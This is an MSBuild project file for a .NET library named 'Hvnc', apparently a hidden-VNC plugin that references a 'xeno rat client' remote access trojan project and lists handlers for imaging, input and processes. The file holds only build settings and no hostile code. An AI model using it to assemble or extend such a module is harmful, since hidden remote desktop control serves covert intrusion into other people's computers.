<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Library</OutputType>
    <TargetFramework>net48</TargetFramework>
    <RootNamespace>Hvnc</RootNamespace>
    <AssemblyName>Hvnc</AssemblyName>
    <FileAlignment>512</FileAlignment>
    <Deterministic>true</Deterministic>
  </PropertyGroup>

  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
    <DebugSymbols>true</DebugSymbols>
    <DebugType>full</DebugType>
    <Optimize>false</Optimize>
    <DefineConstants>DEBUG;TRACE</DefineConstants>
    <ErrorReport>prompt</ErrorReport>
    <WarningLevel>4</WarningLevel>
  </PropertyGroup>

  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
    <DebugType>pdbonly</DebugType>
    <Optimize>true</Optimize>
    <DefineConstants>TRACE</DefineConstants>
    <ErrorReport>prompt</ErrorReport>
    <WarningLevel>4</WarningLevel>
  </PropertyGroup>

  <ItemGroup>
    <PackageReference Include="System.Drawing.Common" Version="6.0.0" />
    <PackageReference Include="System.Management.Common" Version="6.0.0" />
    <PackageReference Include="System.Windows.Forms" Version="6.0.0" />
  </ItemGroup>

  <ItemGroup>
    <Compile Include="Hvnc.cs" />
    <Compile Include="ImagingHandler.cs" />
    <Compile Include="InputHandler.cs" />
    <Compile Include="ProcessHandler.cs" />
    <Compile Include="Properties\AssemblyInfo.cs" />
  </ItemGroup>

  <ItemGroup>
    <ProjectReference Include="..\..\xeno rat client\xeno rat client.csproj">
      <Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
      <Name>xeno rat client</Name>
    </ProjectReference>
  </ItemGroup>

</Project>
